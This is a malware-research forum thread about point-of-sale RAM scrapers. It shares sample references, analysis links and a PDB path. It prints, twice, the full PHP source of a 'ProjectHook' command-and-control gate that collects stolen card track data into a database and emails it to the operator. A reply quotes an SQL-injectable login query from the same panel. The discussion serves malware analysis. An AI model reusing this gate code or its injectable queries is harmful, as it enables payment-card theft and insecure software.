Point-of-Sale malwares / RAM scrapers

Forum for analysis and discussion about malware.

Re: Point-of-Sale malwares / RAM scrapers

Postby Xylitol » Wed Apr 20, 2016 12:17 pm

You do not have the required permissions to view the files attached to this post.
User avatar
Xylitol
Global Moderator
 
Posts: 1629
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 485

Re: Point-of-Sale malwares / RAM scrapers

Postby Silence_is_best » Thu Apr 21, 2016 7:23 pm

Thanks so much!
Silence_is_best
 
Posts: 7
Joined: Fri Aug 15, 2014 11:16 am
Reputation point: 0

Re: Point-of-Sale malwares / RAM scrapers

Postby benkow_ » Thu May 19, 2016 8:21 am

You do not have the required permissions to view the files attached to this post.
benkow_
 
Posts: 69
Joined: Sat Jan 24, 2015 12:14 pm
Reputation point: 41

Re: Point-of-Sale malwares / RAM scrapers

Postby xors » Fri Jun 03, 2016 11:03 am

FastPos

Read more about it here:

http://blog.trendmicro.com/trendlabs-se ... ard-theft/

and here

http://documents.trendmicro.com/assets/ ... -theft.pdf

Sample in the attachment

PDB Path: C:\Program Files\WinRAR\Formats\ETC\CPANEL + SURSA\sursa\The Hook\Release\The Hook.pdb
You do not have the required permissions to view the files attached to this post.
User avatar
xors
 
Posts: 132
Joined: Mon May 23, 2016 2:01 am
Location: Greece
Reputation point: 63



Re: Malware collection

Postby EP_X0FF » Sun Oct 16, 2016 7:21 am

You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4750
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 562

Re: Point-of-Sale malwares / RAM scrapers

Postby benkow_ » Sun Oct 23, 2016 4:22 pm

ProjectHook RAM scraper seems to be alive (thx to xylitol)
I cannot found any malware sample but attached the source code of the new panel
Image

new gate rxcx.php:
Code: Select all

<?php
//$email = "XXXX@XXXX.XXX";
$email = "XXXX@XXXX.XX";
$headers  = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: dump@db.com\r\n";

include "db.php";


function getUserIP()
{
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];

    if(filter_var($client, FILTER_VALIDATE_IP))
    {
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP))
    {
        $ip = $forward;
    }
    else
    
{
        $ip = $remote;
    }

    return $ip;
}


$user_ip = getUserIP();

// Initialize ExtendedAddslash() function for every $_POST variable

$byte = $_POST['BYTE'];
$data = $_POST['DATA'];
$id = $_POST['ID'];
$proc = $_POST['PROC'];
$track1 = $_POST['T1'];
$track2 = $_POST['T2'];


// search submission ID

$query = "SELECT * FROM `hook` WHERE `submission_id` = '$id'";
$sqlsearch = mysql_query($query);
$resultcount = mysql_numrows($sqlsearch);

if ($resultcount > 0) {
 
    mysql_query
("UPDATE `hook` SET
                                `ip` = '
$user_ip',
                                `t1` = '
$track1',
                                `t2` = '
$track2',
                                `data` = '
$data',
                                `proc` = '
$proc',       
                                `byte` = '
$byte'
                             WHERE `submission_id` = '
$id'")
     or die(mysql_error());
   
} else {

    mysql_query("INSERT INTO `hook` (ip, data, id,
                                                                          byte, proc, t1, t2)
                               VALUES ('
$user_ip', '$data', '$id',
                                                 '
$byte', '$proc', '$track1', '$track2') ")
    or die(mysql_error()); 

}
mail($email, "New Data: $user_ip $data $proc $track1 $track2", "ip: $user_ip<br>track1: $track1<br>track2: $track2<br>data: $data<br>proc: $proc", $headers);
?>
You do not have the required permissions to view the files attached to this post.
benkow_
 
Posts: 69
Joined: Sat Jan 24, 2015 12:14 pm
Reputation point: 41

Re: Point-of-Sale malwares / RAM scrapers

Postby p1nk » Mon Oct 24, 2016 1:39 am

Looks like they didn't learn to properly handle user input:

Code: Select all
  // Create query
  $q = "SELECT * FROM `dbUsers` WHERE `username`='".$_POST["username"]."' AND `password`='".$_POST["password"]."' LIMIT 1";
  // Run query
  $r = mysql_query($q);
User avatar
p1nk
 
Posts: 39
Joined: Thu Oct 29, 2015 1:09 am
Reputation point: 2

Re: Point-of-Sale malwares / RAM scrapers

Postby Bogdan-Mihai » Mon Oct 24, 2016 8:25 am

benkow_ wrote:ProjectHook RAM scraper seems to be alive (thx to xylitol)
I cannot found any malware sample but attached the source code of the new panel
Image

new gate rxcx.php:
Code: Select all

<?php
//$email = "XXXX@XXXX.XXX";
$email = "XXXX@XXXX.XX";
$headers  = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: dump@db.com\r\n";

include "db.php";


function getUserIP()
{
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];

    if(filter_var($client, FILTER_VALIDATE_IP))
    {
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP))
    {
        $ip = $forward;
    }
    else
    
{
        $ip = $remote;
    }

    return $ip;
}


$user_ip = getUserIP();

// Initialize ExtendedAddslash() function for every $_POST variable

$byte = $_POST['BYTE'];
$data = $_POST['DATA'];
$id = $_POST['ID'];
$proc = $_POST['PROC'];
$track1 = $_POST['T1'];
$track2 = $_POST['T2'];


// search submission ID

$query = "SELECT * FROM `hook` WHERE `submission_id` = '$id'";
$sqlsearch = mysql_query($query);
$resultcount = mysql_numrows($sqlsearch);

if ($resultcount > 0) {
 
    mysql_query
("UPDATE `hook` SET
                                `ip` = '
$user_ip',
                                `t1` = '
$track1',
                                `t2` = '
$track2',
                                `data` = '
$data',
                                `proc` = '
$proc',       
                                `byte` = '
$byte'
                             WHERE `submission_id` = '
$id'")
     or die(mysql_error());
   
} else {

    mysql_query("INSERT INTO `hook` (ip, data, id,
                                                                          byte, proc, t1, t2)
                               VALUES ('
$user_ip', '$data', '$id',
                                                 '
$byte', '$proc', '$track1', '$track2') ")
    or die(mysql_error()); 

}
mail($email, "New Data: $user_ip $data $proc $track1 $track2", "ip: $user_ip<br>track1: $track1<br>track2: $track2<br>data: $data<br>proc: $proc", $headers);
?>


Looks like the author or someone who edited the php files is Romanian - some strings from failed login indicate that.
Bogdan-Mihai
 
Posts: 16
Joined: Thu Mar 24, 2016 9:37 am
Reputation point: 4

PreviousNext

Return to Malware

Who is online

Users browsing this forum: No registered users and 8 guests